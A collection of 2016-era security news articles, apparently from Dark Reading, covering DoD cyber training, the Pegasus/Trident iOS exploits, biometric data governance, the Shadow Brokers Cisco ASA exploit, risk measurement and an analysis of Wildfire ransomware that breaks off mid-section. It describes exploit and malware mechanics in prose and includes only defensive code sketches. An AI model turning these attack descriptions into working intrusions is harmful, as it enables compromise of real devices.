The program likely will employ a sort of ROTC-style model where DoD trains the students and they then owe the military a certain number of years of employment. With the help of DEF CON founder Jeff Moss, DiGiovanni over the past year has met, and then picked the brains of, seasoned hackers and the people who hire them about the types of skills, characteristics, and know-how needed for defending organizations from today's attackers. DiGiovanni, who is also responsible for helping shape retention and recruitment policy efforts in the DoD, has chatted with CEOs of firms that conduct penetration testing, as well as pen testers and other security experts themselves, to get a clearer picture of the types of skills DoD should be teaching, testing, and encouraging in future cybersecurity warriors and civilians. This is the second phase of the development of a prototype cyber training course he spearheads for DoD at Fort McNair: the intensive six-month prototype program currently consists of 30 students from all branches of the military as well as from the US Department of Homeland Security.
It’s all about training a new generation of cybersecurity experts. The big takeaway from DiGiovanni’s DEF CON research: STEM, aka science, technology, engineering, and mathematics, was not one of the top skills organizations look for in their cyber-Jedis. “Almost no one talked about technical capabilities or technical chops,” he says. “That was the biggest revelation for me.” DiGiovanni compiled a list of attributes for the cyber-Jedi archetype based on his interviews.

The ultimate hacker/security expert, he found, has skillsets such as creativity and curiosity, resourcefulness, persistence, and teamwork, for example. A training exercise spinoff of DEF CON’s famed capture-the-packet (CTP) contest also will become part of the DoD training program.

DiGiovanni recruited DEF CON CTP and Wall of Sheep mastermind Brian Markus to repurpose his capture-the-packet technology as a training exercise module. “In October, he will submit to the government a repackaged capture-the-packet training capability for DoD, which is huge,” DiGiovanni says.

Also on tap is a capture-the-flag competition, DoD-style, he says. One of the security experts DiGiovanni met with at DEF CON this year was Patrick Upatham, global director of advanced cybersecurity at Digital Guardian. “I was a little apprehensive at first,” Upatham says. “After learning what they are doing and the approach that they are taking, it totally made sense.” “He [Frank] is looking for a completely different mindset and background, and [to] then train that person with the technical detail” to do the job, Upatham says. “They are looking for folks who are more resourceful and persistent, and creative in their mindset.” DoD’s training program is about being more proactive in building out its cybersecurity workforce.

That’s how it has to work now, given that more than 200,000 cybersecurity jobs were left unfilled last year overall.

DoD’s Cyber Mission Force is calling for some 6,200 positions to be filled. The goal is to train that workforce in both offensive and defensive security skills.

That means drilling down on the appropriate problem-based learning, for example.

The current prototype training program doesn't require a four-year degree, and it's more of a "journeyman apprentice" learning model, DiGiovanni says. About 80% or so is hands-on keyboard training, he says, with the rest lecture-based. "A lot of the lectures are by the students themselves, with a learn-by-teaching model," he says.

From 'Cable Dog' To Hax0r

DiGiovanni gave an example of one student in the DoD training program who came in knowing nothing about security.

The young man was a self-professed  “cable dog” at Fort Meade, a reference to his job of pulling cable through pipes.

But when he finished the six-month DoD course, he was reverse-engineering malware. “When he came to the course, he didn’t know what a ‘right-click’” of a mouse was, nor did he have any software technology experience, DiGiovanni recalls. “To me, that’s a heck of a success story.” The next step is determining how to scale the DoD training program so that it can attract and train enough cyber warriors for the future.

The goal is to hand off the training program to a partner organization to run it and carry it forward, possibly as early as this fall, he says. Meantime, DiGiovanni says the DEF CON hacker community is a key resource and potential partner. “The security of our nation is at stake.
I think it's imperative for DoD to embrace the DEF CON community because of the unique skill they bring to the table," he says. "They want to serve and contribute, and the nation needs them." Kelly Jackson Higgins is Executive Editor at DarkReading.com.
She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...

Multiple Apple iOS Zero-Days Enabled Firm To Spy On Targeted iPhone...

Victims of 'lawful intercepts' include human rights activists and a journalist, researchers from Citizen Lab and Lookout say. Apple's much-vaunted reputation for security took a bit of a beating this week with two separate reports identifying serious vulnerabilities in its iOS operating system for iPhones and iPads. One of the reports, from security firm Lookout and the University of Toronto's Citizen Lab, details a trio of zero-day vulnerabilities in iOS, dubbed Trident, that a shadowy company called the NSO Group has been exploiting for several years to spy on targeted iOS users. The NSO Group is based in Israel but owned by an American private-equity firm. The company has developed a highly sophisticated spyware product called Pegasus that takes advantage of the Trident zero-day exploit chain to jailbreak iOS devices and install malware on them for spying on users. In an alert this week, security researchers at Citizen Lab and Lookout described Pegasus as one of the most sophisticated endpoint malware threats they had ever encountered.

The malware exploits a kernel base mapping vulnerability, a kernel memory corruption flaw and a flaw in the Safari WebKit that basically lets an attacker compromise an iOS device by getting the user to click on a single link. All three are zero-day flaws, which Apple has addressed via its 9.3.5 patch.

The researchers are urging iOS users to apply the patch as soon as possible. Pegasus, according to the security researchers, is highly configurable and is designed to spy on SMS text messages, calls, emails, logs and data from applications like Facebook, Gmail, Skype, WhatsApp and Viber running on iOS devices. “The kit appears to persist even when the device software is updated and can update itself to easily replace exploits if they become obsolete,” the researchers said in their alert. Evidence suggests that Pegasus has been used to conduct so-called ‘lawful intercepts’ of iOS owners by governments and government-backed entities.

The malware kit has been used to spy on a noted human rights activist in the United Arab Emirates, a Mexican journalist who reported on government corruption and potentially several individuals in Kenya, the security researchers said. The malware appears to emphasize stealth very heavily and the authors have gone to considerable efforts to ensure that the source remains hidden. “Certain Pegasus features are only enabled when the device is idle and the screen is off, such as ‘environmental sound recording’ (hot mic) and ‘photo taking’,” the researchers noted.   The spyware also includes a self-destruct mechanism, which can activate automatically when there is a probability that it will be discovered. Like many attacks involving sophisticated malware, the Pegasus attack sequence starts with a phishing text—in this case a link in an SMS message—which when clicked initiates a sequence of actions leading to device compromise and installation of malware. Because of the level of sophistication required to find and exploit iOS zero-day vulnerabilities, exploit chains like Trident can fetch a lot of money in the black and gray markets, the researchers from Citizen Lab and Lookout said.

As an example, they pointed to an exploit chain similar to Trident that sold for $1 million last year. The second report describing vulnerabilities in iOS this week came from researchers at North Carolina State University, TU Darmstadt (a research university in Germany), and University Politehnica of Bucharest. In a paper to be presented at an upcoming security conference in Vienna, the researchers said they focused on iOS' sandbox feature to see if they could find any security vulnerabilities that could be exploited by third-party applications.

The exercise resulted in the researchers unearthing multiple vulnerabilities that would enable adversaries to launch different kinds of attacks on iOS devices via third-party applications. Among them were attacks that would let someone bypass iOS’ privacy setting for contacts, gain access to a user’s location search history, and prevent access to certain system resources.
In an alert, a researcher who co-authored the paper said that the vulnerabilities have been disclosed to Apple, which is now working on fixing them. Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

The Hidden Dangers Of 'Bring Your Own Body'

The use of biometric data is on the rise, causing new security risks that must be assessed and addressed. The term “BYOB” might have more interpretations than you think.
Increasingly, in the area of enterprise security and data, it could mean “bring your own body.” The use of biometric data, in both consumer and enterprise technology, is on the rise.

The average worker in a business environment now generates more types of data more quickly than ever, and at higher volumes.
Increasingly, some of that data might be biometric. To understand the sensitive role of biometric data in enterprise information governance, you first have to understand its basic nature -- mainly, that it is very difficult to alter and often inextricable from the individual that it came from. You can easily change your debit card number if it has been stolen, right? But doing the same for your fingerprints or iris is impossible.

Biometric information doesn’t simply provide a code or number permanently assigned to a person, it provides a measure of that person.

Biometric systems provide data on the fundamental physical identity of the self -- a self that has the right to change jobs, move on from an organization, and still have the reasonable expectation that his or her identity and data will remain protected. So, for professionals who work in information governance, this brings up two critical questions: 1. Who, exactly, has ownership of this data? 2. How should the business manage this data? The first, unfortunately, is nearly impossible to answer now. Privacy laws for nonmedical biometric data are still nascent in the US, and determining data ownership between the enterprise and the individual can be difficult and is influenced by many variables. Many businesses harbor some sort of biometric data originating from employees.
So, while the first question may remain unanswered now, it’s clear that data management itself must be considered before biometric data becomes more commonplace.

Failure to think about governance and security practices today could mean beginning too late to prevent a breach or misappropriation tomorrow. There may not be that much biometric data currently in the average enterprise, but its use is on the rise.

Both the private and public sectors probably (and legally) have some of your biometric data right now.
If you’ve ever worked for a government-affiliated organization and achieved any type of security clearance, it has your fingerprint data.
If you have a US driver’s license  -- even if you have no criminal record -- there’s a good chance that the FBI is already analyzing your photo for a facial-recognition database.

The information that HR departments handle on a regular basis -- Social Security numbers, home addresses, health insurance details, tax information, etc. -- all pose threats to privacy and security that are practically incomparable to traditionally stolen data types such as credit card numbers. These hypothetical threats may seem nebulous given today’s relatively low use of biometrics in the average business, but they’re still a concern.
If a regular breach of business documents is a disaster, one involving inherently personal data is a legal, monetary, and PR disaster. As of 2016, the average cost of a breach in the US is $4 million, and the average cost of an individual breached business record is $158.

Because most of these breaches until now have been of more traditional data types such as business records, emails, and financial data, the enterprise should expect increasing costs with the availability of increasingly granular data belonging to individuals.

The most-prized data types currently are those that the individual can’t change; medical records have far surpassed credit card numbers in their value on the black market.
It’s not unlikely that personal biometric data -- especially types that are unalterable -- will have similar value. The most logical first step for today’s information governance professionals would be to simply identify what biometric data may exist within the enterprise.

This can include (but isn't limited to) the following:

- Fingerprints
- Iris scans/images
- Close-up facial photos
- EEGs (used in neuromarketing research)
- Fitness tracker and heart-rate data
- Personal handwriting and signatures

Once that's done, mapping the potential locations where that data exists is necessary to determine where the most likely risks lie. Possible places where biometric data resides within the enterprise include:

- File-sharing environments
- Archives and information governance platforms
- Building entry and physical security systems
- Third-party password management software
- Productivity platforms (such as Evernote)
- Scanned and photographed note repositories
- Enterprise social media accounts
- Software-as-a-service products

The key objective for the immediate future is to determine what's within the realm of control, and how security can be strengthened for the locations where sensitive items are most likely to reside (a simple scanning sketch follows).
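As a purely illustrative first pass at that inventory -- not a complete discovery method -- the sketch below walks a file share and flags files whose names hint at biometric content. The keyword list and the share path are assumptions made for the example.

```python
# Illustrative sketch only: flag files whose names suggest biometric content.
# The keyword list and the scan root below are assumptions, not a standard.
import os

BIOMETRIC_HINTS = ("fingerprint", "iris", "retina", "facial", "voiceprint",
                   "eeg", "heartrate", "heart_rate", "signature")

def find_candidate_files(root):
    """Yield paths under 'root' whose file names contain a biometric-related keyword."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            lowered = name.lower()
            if any(hint in lowered for hint in BIOMETRIC_HINTS):
                yield os.path.join(dirpath, name)

if __name__ == "__main__":
    # Hypothetical file-share path; replace with the locations identified above.
    for path in find_candidate_files(r"\\fileserver\hr-share"):
        print(path)
```

Name-based heuristics obviously miss a great deal; in practice a pass like this would only feed a broader classification effort.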

This relatively simple task today will be important for the future, regardless of how common biometric data becomes in business. So “bring your own body” isn’t quite the HR policy violation it sounds like.
It’s a call to action for information governance and security.
It's time to identify sources of employee biometric data, and to ensure that it is properly governed and secured within enterprise systems.

Kon Leong is CEO/Co-founder of ZL Technologies.

For two decades, he has been immersed in large-scale information technologies to solve "big data" issues for enterprises. His focus for the last 14+ years has been on massively scalable archiving technology to solve records ...

Apple Releases Patch For 'Trident,' A Trio Of iOS 0-Days

Already rolled into the Pegasus spyware product and used to target social activists, the vulnerabilities are fixed in iOS 9.3.5. Apple today released patches for a trio of iOS zero-day vulnerabilities that, when used together, enable an attacker to remotely and silently jailbreak a device and install highly sophisticated spyware on it. The vulnerabilities, collectively called "Trident," are patched in iOS version 9.3.5.

They include CVE-2016-4655 (an information leak in the kernel), CVE-2016-4656 (kernel memory corruption leading to jailbreak), and CVE-2016-4657 (memory corruption in WebKit). The discovery was made by Lookout and Citizen Lab, who worked with Apple on the patch before making the disclosure.

Citizen Lab was tipped off to the bugs first by United Arab Emirates-based human rights defender Ahmed Mansoor, who reported that he had received suspicious text messages.

Citizen Lab and Lookout investigated, and found that Mansoor -- who has been targeted by "lawful intercept malware" in the past -- was being targeted by the Pegasus spyware product, developed by NSO Group (owned by Francisco Partners Management) and now equipped to exploit this trio of undisclosed iOS zero-day vulnerabilities. For more information, see the blog at Lookout.

Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.

The Secret Behind the NSA Breach: Network Infrastructure Is the Next...

How the networking industry has fallen way behind in incorporating security measures to prevent exploits against ubiquitous routers, proxies, firewalls and switches. Advanced attackers are targeting organizations' first line of defense -- their firewalls -- and turning them into gateways into the network for mounting a data breach. On August 13, the shady "Shadow Brokers" group published several firewall exploits as proof that they had a full trove of cyber weapons. Whether intended to drive up bids for their "Equation Group Cyber Weapons Auction" (since removed), or to threaten other nation-states, the recent disclosure raises the question: if organizations can't trust their own firewalls, then what can they trust? Does the cache of cyber weapons exposed by Shadow Brokers signal a shift in attack methods and targets? We analyzed the dump and found working exploits for Cisco ASA, Fortinet FortiGate and Juniper SRX (formerly NetScreen) firewalls.

The names of the exploits provided by the Shadow Brokers match the code names described in Edward Snowden’s 2013 revelations of NSA snooping. The exploit names are not the only link to the NSA.

By analyzing the implementation of a cryptographic function, researchers at Kaspersky have found the same encryption constant used in malware attributed to the Equation Group (Kaspersky's nickname for the NSA) and in the Python code from the latest leak.

Cyber Attacks with a Side of EXTRABACON

Researching one of the Cisco ASA exploits (dubbed EXTRABACON) in our lab, we found that it's a simple overflow using SNMP read access to the device.

The additional payload bundled with the exploit removes the password needed for SSH or telnet shell access, providing full control over the appliance.

The payload can also re-enable the original password to reduce the chance that the attacker will be detected. The python code handles multiple device versions and patches the payload for the version at hand.

This hints at the number of operations the group has run in the past, as the developers probably modified the exploit on a case-by-case basis. We ran the exploit against a supported version of a Cisco ASA in our lab multiple times and it didn't crash once, showing the prowess of the exploit developers. Our attempt yielded a shell without password protection:

Networking Equipment in the Crosshairs

While the exploits themselves are interesting in their own right, no one is addressing the elephant in the room: attackers increasingly target network infrastructure, including security devices, as a means to infiltrate networks and maintain persistence. While the entire cybersecurity industry is focused on defending endpoints and servers, attackers have moved on to the next weak spot.

This advancement underscores the need to detect active network attackers, because they can certainly -- one way or another -- penetrate any given network. Persisting and working from routers, proxies, firewalls or switches requires less effort than controlling endpoints; attackers don't need to worry that an anti-virus agent will detect an unusual process, and networking devices are rarely updated or replaced. Most networks still have the same routers and switches they had a decade ago. Plus, few forensics tools are available to detect indicators of compromise on networking devices, and attackers can gain an excellent vantage point within the network. Network device vendors have fallen behind operating system vendors in terms of implementing stronger security measures.

A wide range of networking equipment still runs single-process operating systems without any exploit mitigation enabled (Cisco IOS, I'm looking at you) or shows the effects of little to no security quality assurance testing.
In recent years, endpoint and mobile operating systems have incorporated security techniques such as address space layout randomization (ASLR), data execution prevention (DEP), sandboxes, and other methods that made life harder for every exploit writer.
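As a rough illustration of that gap -- not a vendor-specific check -- the sketch below uses the standard binutils readelf tool to test whether an ELF binary pulled from a firmware image was built as a position-independent executable (a prerequisite for effective ASLR) and with a non-executable stack. The firmware path is a hypothetical example, and readelf must be installed.

```python
# Illustrative check for two basic exploit mitigations in an ELF binary,
# via the binutils 'readelf' tool (assumed to be on the PATH).
import subprocess

def _readelf(args, path):
    return subprocess.run(["readelf", *args, path],
                          capture_output=True, text=True, check=True).stdout

def has_pie(path):
    """PIE binaries are reported by 'readelf -h' with ELF type DYN."""
    for line in _readelf(["-h"], path).splitlines():
        if line.strip().startswith("Type:"):
            return "DYN" in line
    return False

def has_nx_stack(path):
    """A non-executable stack shows up as a GNU_STACK segment without the E flag."""
    for line in _readelf(["-lW"], path).splitlines():
        if "GNU_STACK" in line:
            return "RWE" not in line
    return False  # no GNU_STACK header at all is itself a bad sign

if __name__ == "__main__":
    target = "/tmp/firmware/usr/sbin/httpd"  # hypothetical extracted binary
    print("PIE:", has_pie(target))
    print("NX stack:", has_nx_stack(target))
```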

The affected networking devices provide none of these security mechanisms and it shows.

Not the First and Definitely Not the Last

The Equation Group breach is not the first example of highly capable attackers targeting network devices.

The threat actor behind last year’s Hacking Team breach leveraged a vulnerability in a VPN device to obtain full access to their internal network without any obstacles.

The attacker moved from the networking device to endpoints without using a single piece of malware, only taking what he needed from endpoints remotely or running well-known administrative tools.

This is a soft spot in every endpoint solution's belly: a privileged attacker using legitimate credentials to access files is not considered malicious as long as he doesn't use any malicious software. Note that, as we stated earlier, the attacker (quoted on Pastebin) opted for an exploit against an embedded device rather than the other options, stating that it was the easiest one: So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices.

A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.
As always, nation-state attacks are usually a step ahead of the entire industry, both defensively and offensively. We will probably see the same methods employed by less sophisticated attackers as it becomes increasingly difficult to compromise endpoint devices and stay undetected. We have seen this happen before: cybercrime attackers stole techniques from the Equation Group, as well as from the Stuxnet, Flame and Regin malware and other APTs, and it will surely happen again with the Equation Group's recently leaked exploits. In the meantime, here are four recommendations to help fortify network devices against attack:

Recommendation 1: Patch your network devices promptly. Replace network devices that have reached their end-of-support date.

Recommendation 2: Restrict access to device management addresses to the minimum required, and block any unneeded, seemingly benign protocols, including SNMP and NTP.

Recommendation 3: Manage your device passwords as you would your administrator accounts, by periodically changing them and defining a different password for each device. Do not use a standard template for passwords. For example, the password Rout3rPassw0rd192.168.1.1 might seem strong, but after compromising one device the attacker will know all of the passwords (see the sketch after these recommendations).

Recommendation 4: Deploy a network monitoring solution that can profile users and IP-connected devices to establish a baseline of normal behavior and then detect unusual activity originating from network devices.
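To make Recommendation 3 concrete, here is a minimal sketch (the device names and output handling are illustrative assumptions) that generates an independent random password per device instead of deriving passwords from a template; in practice the output belongs in a password vault, not a plain file.

```python
# Illustrative only: one independent, random password per network device.
import csv
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def generate_password(length=20):
    """Return a cryptographically random password."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def build_credential_sheet(device_names, out_path="device_credentials.csv"):
    """Write one unique password per device; store the result in a vault, not a file share."""
    with open(out_path, "w", newline="") as fh:
        writer = csv.writer(fh)
        writer.writerow(["device", "password"])
        for name in device_names:
            writer.writerow([name, generate_password()])

if __name__ == "__main__":
    # Hypothetical device names for illustration.
    build_credential_sheet(["edge-fw-01", "core-sw-01", "branch-rtr-07"])
```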

Attackers have no way of knowing what "normal" looks like for any given network, and network detection is the only generic way to stop attackers from compromising network devices.

Yoni Allon is responsible for leading the LightCyber research team in monitoring and researching cybercriminal and cyberwarfare actions and ensuring that the LightCyber Magna platform accurately finds these behaviors through its detectors and machine learning. Mr.

Allon has ...

Security Leadership & The Art Of Decision Making

What a classically trained guitarist with a master's degree in counseling brings to the table as head of cybersecurity and privacy at one of the world's major healthcare organizations. Bishop Fox's Vincent Liu sat down recently with GE Healthcare Cybersecurity and Privacy General Manager Richard Seiersen in a wide-ranging chat about security decision making, how useful threat intelligence is, critical infrastructure, the Internet of Things, and his new book on measuring cybersecurity risk. We excerpt highlights below. You can read the full text here. Fourth in a series of interviews with cybersecurity experts by cybersecurity experts. Vincent Liu: How has decision making played a part in your role as a security leader? Richard Seiersen: Most prominently, it's led me to the realization that we have more data than we think and need less than we think when managing risk.
In fact, you can manage risk with nearly zero empirical data.
In my new book “How to Measure Anything in Cybersecurity Risk,” we call this “sparse data analytics.” I also like to refer to it as “small data.” Sparse analytics are the foundation of our security analytics maturity model. The other end is what we term “prescriptive analytics.” When we assess risk with near zero empirical data, we still have data, which we call “beliefs.” Consider the example of threat modeling. When we threat model an architecture, we are also modeling our beliefs about threats. We can abstract this practice of modeling beliefs to examine a whole portfolio of risk as well. We take what limited empirical data we have and combine it with our subject matter experts’ beliefs to quickly comprehend risk. VL: If you’re starting out as a leader, and you want to be more “decision” or “measurement” oriented, what would be a few first steps down this road? RS: Remove the junk that prevents you from answering key questions. I prefer to circumvent highs, mediums, or lows of any sort, what we call in the book “useless decompositions.” Instead, I try to keep decisions to on-and-off choices. When you have too much variation, risk can be amplified. Most readers have probably heard of threat actor capability.

This can be decomposed into things like nation-state, organized crime, etc. We label these "useless decompositions" when they are used out of context. Juxtapose these with useful decompositions, which are based on observable evidence.

For example, “Have we or anyone else witnessed this vulnerability being exploited?” More to the point, what is the likelihood of this vulnerability being exploited in a given time frame? If you have zero evidence of exploitability anywhere, your degree of belief would be closer to zero. And when we talk about likelihood, we are really talking about probability. When real math enters the situation, most reactions are, “Where did you get your probability?” My answer is usually something like, “Where do you get your 4 on a 1-to-5 scale, or your ‘high’ on a low, medium, high, critical scale?” A percentage retains our uncertainty.
Scales are placebos that make you feel as if you have measured something when you actually haven't. This type of risk management based on ordinal scales can be worse than doing nothing.

VL: My takeaway is the more straightforward and simple things are, the better.

The more we can make a decision binary, the better.

Take CVSS (Common Vulnerability Scoring System). You have several numbers that become an aggregate number that winds up devoid of context. RS: The problem with CVSS is it contains so many useless decompositions.

The more we start adding in these ordinal scales, the more we enter this arbitrary gray area. When it comes to things like CVSS and OWASP, the problem also lies with how they do their math. Ordinal scales are not actually numbers. For example, let’s say I am a doctor in a burn unit.
I can return home at night when the average burn intensity is less than 5 on a 1-to-10 ordinal scale.
If I have three patients with burns that rank a 1, a 3, and a 10 respectively, my average is less than a 5 (the mean of 1, 3, and 10 is roughly 4.7). Of course, I have one person nearing death, but it's quitting time and I am out of there! That makes absolutely no sense, but it is exactly how most industry frameworks and vendors implement security risk management.
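A small numeric illustration of the point (not taken from the interview, and with made-up probabilities and costs): averaging the ordinal scores hides the critical case, while even a crude probability-times-impact view keeps it front and center.

```python
# Ordinal average vs. a crude probability/impact view (illustrative numbers only).
burn_scores = [1, 3, 10]                      # ordinal 1-to-10 severity ratings
print(sum(burn_scores) / len(burn_scores))    # ~4.67: "under 5, go home"

# The same three cases as (probability of a critical outcome, cost if it happens).
cases = [(0.01, 10_000), (0.05, 50_000), (0.90, 2_000_000)]
expected_loss = sum(p * cost for p, cost in cases)
print(f"expected loss: ${expected_loss:,.0f}")  # dominated by the near-certain severe case
```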

This is a real problem.

That approach falls flat when you scale out to managing portfolios of risk. VL: How useful is threat intelligence, then? RS: We have to ask -- and not to be mystical here -- what threat intelligence means.
If you’re telling me it is an early warning system that lets me know a bad guy is trying to steal my shorts, that’s fine.
It allows me to prepare myself and fortify my defenses (e.g., wear a belt) at a relatively sustainable cost. What I fear is that most threat intelligence data is probably very expensive, and oftentimes redundant noise. VL: Where would you focus your energy then? RS: For my money, I would focus on how I design, develop, and deploy products that persist and transmit or manage treasure.

Concentrate on the treasure; the bad guys have their eyes on it, and you should have your eyes directed there, too. This starts in design, and not enough of us who make products focus enough on design. Of course, if you are dealing with the integration of legacy “critical infrastructure”-based technology, you don’t always have the tabula rasa of design from scratch. VL: You mean the integration of critical infrastructure with emerging Internet of Things technology, is that correct? RS: Yes; we need to be thoughtful and incorporate the best design practices here.

Also, due to the realities of legacy infrastructure, we need to consider the “testing in” of security.
Ironically, practices like threat modeling can help us focus our testing efforts when it comes to legacy.
I constantly find myself returning to concepts like the principle of least privilege, removing unnecessary software and services.
In short, focusing on reducing attack surface where it counts most. Oldies, but goodies! VL: When you’re installing an alarm system, you want to ensure it is properly set up before you worry about where you might be attacked. Reduce attack surface, implement secure design, execute secure deployments. Once you’ve finished those fundamentals, then consider the attackers’ origin. RS:  Exactly! As far as the industrial IoT (IIoT) or IoT is concerned, I have been considering the future of risk as it relates to economic drivers...

Connectivity, and hence attack surface, will naturally increase due to a multitude of economic drivers.

That was true even when we lived in analog days before electricity. Now we have more devices, there are more users per device, and there are more application interactions per device per user.

This is an exponential growth in attack surface. VL: And the more attack surface signals more room for breach. RS: As a security professional, I consider what it means to create a device with minimal attack surface but that plays well with others.
I would like to add [that] threat awareness should be more pervasive, individually and collectively. Minimal attack surface means less local functionality exposed to the bad guy, and possibly less compute on the endpoint as well. Push things that change, and/or need regular updates, to the cloud. "Plays well with others" means making services available for use and consumption; this can include monitoring from a security perspective.

These two goals seem at odds with one another. Necessity then becomes the mother of invention.

There will be a flood of innovation coming from the security marketplace to address the future of breach caused by a massive growth in attack surface.  Richard Seiersen, General Manager of Cybersecurity and Privacy, GE Healthcare PERSONALITY BYTES First career interest: Originally a classical musician who transitioned into teaching music. Start in security: My master’s degree capstone project was focused on decision analysis.
It was through this study that I landed an internship at a company called TriNet, which was then a startup. My internship soon evolved into a risk management role with plenty of development and business intelligence. Best decision-making advice for security leaders: Remove the junk that prevents you from answering key questions. Most unusual academic credential: Earned a Master in Counseling with an emphasis on decision making ages ago.
I focused on a framework that combined deep linguistics analysis with goal-setting to model effective decision making. You could call it “agile counseling” as opposed to open-ended soft counseling. More recently, I started a Master of Science in Predictive Analytics. My former degree has affected how I frame decisions and the latter brings in more math to address uncertainty.

Together they are a powerful duo, particularly when you throw programming into the mix. Number one priority since joining GE: A talent-first approach in building a global team that spans device to cloud security. Bio: Richard Seiersen is a technology executive with nearly 20 years of experience in information security, risk management, and product development.

Currently he is the general manager of cybersecurity and privacy for GE Healthcare. Richard now lives with his family of string players in the San Francisco Bay Area.
In his limited spare time he is slowly working through his MS in predictive analytics at Northwestern. He should be done just in time to retire. He thinks that will be the perfect time to take up classical guitar again.

Vincent Liu (CISSP) is a Partner at Bishop Fox, a cybersecurity consulting firm providing services to the Fortune 500, global financial institutions, and high-tech startups.
In this role, he oversees firm management, client matters, and strategy consulting.
Vincent is a ...

Wildfire Ransomware Code Cracked – Unlock For Free

Wildfire ransomware has plagued victims in the Netherlands and Belgium. Image: McAfee Labs

Victims of the Wildfire ransomware can get their encrypted files back without paying hackers for the privilege, after the No More Ransom initiative released a free decryption tool. No More Ransom runs a web portal that provides keys for unlocking files encrypted by various strains of ransomware, including Shade, CoinVault, Rannoh, Rakhni and, most recently, Wildfire. Aimed at helping ransomware victims retrieve their data, No More Ransom is a collaborative project between Europol, the Dutch National Police, Intel Security, and Kaspersky Lab. Wildfire victims are served with a ransom note demanding payment of 1.5 Bitcoins -- the cryptocurrency favored by cybercriminals -- in exchange for unlocking the encrypted files. However, cybersecurity researchers from McAfee Labs, part of Intel Security, point out that the hackers behind Wildfire are open to negotiation, often accepting 0.5 Bitcoins as payment. Most victims of the ransomware are located in the Netherlands and Belgium, with the malicious software spread through phishing emails aimed at Dutch speakers.

The email claims to be from a transport company and suggests that the target has missed a parcel delivery -- encouraging them to fill in a form to rearrange delivery for another date.
It's this form that drops the Wildfire ransomware onto the victim's system and locks it down.

A spam email used to infect victims with Wildfire. Image: McAfee Labs

Researchers note that those behind Wildfire have "clearly put a lot of effort into making their spam mails look credible and very specific" -- even adding the addresses of real businesses in the Netherlands -- arousing suspicion that there are Dutch-speaking actors involved in the ransomware campaign. Working in partnership with law enforcement agencies, cybersecurity researchers were able to examine Wildfire's control server panel, which showed that in a one-month period the ransomware infected 5,309 systems and generated revenue of 136 Bitcoins (€70,332). Researchers suggest that the malicious code -- which contains instructions not to infect Russian-speaking countries -- means Wildfire operates as part of a ransomware-as-a-service franchise, with the software likely leased out by developers in Eastern Europe. Whoever is behind Wildfire, victims no longer need to pay a ransom in order to get their files back, with the decryptor tool now available to download for free from the No More Ransom site.

The tool contains 1,600 keys for Wildfire, and No More Ransom says more will be added in the near future.
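As a purely illustrative aside -- this is not how the No More Ransom tool is actually implemented -- a decryptor that ships with many candidate keys can identify the right one by trial decryption against known file signatures. The key handling, IV source and signature list below are assumptions; the sketch uses the third-party cryptography package.

```python
# Illustrative only: pick the right key from a list of candidates by trial
# decryption of the first ciphertext block and a check for known file headers.
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

KNOWN_SIGNATURES = (b"%PDF", b"PK\x03\x04", b"\xff\xd8\xff")  # PDF, ZIP/Office, JPEG

def find_key(ciphertext, iv, candidate_keys):
    """Return the first candidate AES key whose decryption yields a plausible header."""
    first_block = ciphertext[:16]
    for key in candidate_keys:
        decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        plaintext = decryptor.update(first_block) + decryptor.finalize()
        if plaintext.startswith(KNOWN_SIGNATURES):
            return key
    return None
```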

Wildfire, the ransomware threat that takes Holland and Belgium hostage

While ransomware is a global threat, every now and then we see a variant that targets one specific region.

For example, the CoinVault malware had many infections in the Netherlands, because the authors posted the malicious software on Usenet and Dutch people are particularly fond of downloading things over Usenet.

Another example is the recent Shade campaign, which mostly targets Russia and the CIS. Today we can add a new one to the list: Wildfire.

Infection vector

Wildfire spreads through well-crafted spam e-mails.

A typical spam e-mail mentions that a transport company failed to deliver a package.
To schedule a new delivery, the receiver is asked to make a new appointment by filling in a form that has to be downloaded from the transport company's website. Three things stand out here.

First, the attackers registered a Dutch domain name, something we do not see very often.
Second, the e-mail is written in flawless Dutch.

And third, they actually put the address of the targeted company in the e-mail -- again something we do not see very often, and something that makes it difficult for the average user to recognize that this is not a benign e-mail. However, when we look at who registered the domain name, we immediately see that something is off: both the registration date (a few days before the spam campaign started) and the administrative contact person look very suspicious.

The Word document

After the user downloads and opens the Word document, the following screen is shown: Apparently the document has some macros that clearly show the attackers' intent; they contain pieces of English text (actually the lyrics of the famous Pink Floyd song "Money") but also several variables in the Polish language.

The ransomware itself

The macros download and execute the actual Wildfire ransomware, which in the case we analyzed consists of the following three files: Usiyykssl.exe; Ymkwhrrxoeo.png; Iesvxamvenagxehdoj.xml. The exe file is an obfuscated .NET executable that depends on the other two files.

This is very similar to the Zyklon ransomware, which also consists of three files.

Another similarity is that, according to some sources (http://www.bleepingcomputer.com/forums/t/611342/zyklon-locker-gnl-help-topic-locked-and-unlock-files-instructionshtml/, http://www.bleepingcomputer.com/forums/t/618641/wildfire-locker-help-topic-how-to-unlock-files-readme-6de99ef7c7-wflx/), Wildfire, GNLocker and Zyklon mainly target the Netherlands.
In addition, the ransom notes of Wildfire and Zyklon look quite similar.

Also note that Wildfire and Zyklon increase the amount you have to pay threefold if you don't pay within the specified time. Anyway, back to Wildfire.

The binary is obfuscated, meaning that, when no deobfuscator is available, reversing and analyzing it can take a lot of time.

Therefore we decided to run it and see what happened. Just as we hoped, this made things a bit easier: after a while Usiyykssl.exe launched Regasm.exe, and when we looked into the memory of Regasm.exe we clearly saw that some malicious code had been injected into it. Dumping it gave us the binary of the actual Wildfire malware. Unfortunately for us, this binary is also obfuscated, this time with ConfuserEx 0.6.0.

Even though it is possible to deobfuscate binaries protected with ConfuserEx, we decided to skip that for now. Why? It takes a bit of time, and because we were working together with the police on this case, we had something much better in our hands: the botnetpanel code!

Inside the botnetpanel code

